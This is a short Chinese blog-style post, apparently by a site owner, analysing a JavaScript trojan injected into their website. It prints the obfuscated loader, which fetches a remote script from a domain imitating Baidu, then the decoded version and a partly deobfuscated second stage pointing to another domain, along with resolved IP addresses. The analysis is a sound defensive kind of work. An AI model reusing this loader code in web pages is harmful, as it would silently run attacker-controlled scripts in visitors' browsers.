自己也不记得多长时间没有被挂过js木马了,虽然被挂,还挺新奇的 js木马代码: ;if(!(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf(‘.’) !== -1)){var ZPnUAADj=document.createElement(‘script’);ZPnUAADj.type = ‘text/javascript’; ZPnUAADj.src = ‘\x68\x74\x74\x70\x73://\x7a\x7a.\x62\x64\x75\x73\x74\x61\x74\x69\x63.\x63\x6f\x6d/\x6c\x69\x6e\x6b\x73\x75\x62\x6d\x69\x74/\x70\x75\x73\x68.\x6a\x73’; var xquXEbQZC=document.head || document.body;xquXEbQZC.appendChild(ZPnUAADj);} 解密后: ; if (!(/^Mac|Win/.test(navigator.platform)) && (document.referrer.indexOf(‘.’) !== -1)) { var ZPnUAADj = document.createElement(‘script’); ZPnUAADj.type = ‘text/javascript’; ZPnUAADj.src = ‘https://zz.bdustatic.com/linksubmit/push.js’; var xquXEbQZC = document.head || document.body; xquXEbQZC.appendChild(ZPnUAADj); } 伪装的百度的js,应该是使用了百度广告的直投功能,继续解密:https://zz.bdustatic.com/linksubmit/push.js 解密部分后,得到以下代码: var _0xodA = ‘5uluCj’, _0xodA_ = function() { return [‘_0xodA’], _0x154f = [_0xodA, ‘createElement’, ‘script’, ‘src’, ‘https://pinz8ta5.com/99948456206396679.js’, ‘getElementsByTagName’, ‘parentNode’, ‘insertBefore’, ‘d5rYdNQUkNuKzNTBlhMuCjxL==’]; }(); 得到js木马网址 https://pinz8ta5.com/99948456206396679.js,内容是空的,应该不是js木马真实地址 ping一下,得到ip,中国/香港/microsoft.com:20.205.140.46 20.205.136.131 20.205.142.92 未完待续
没有回复内容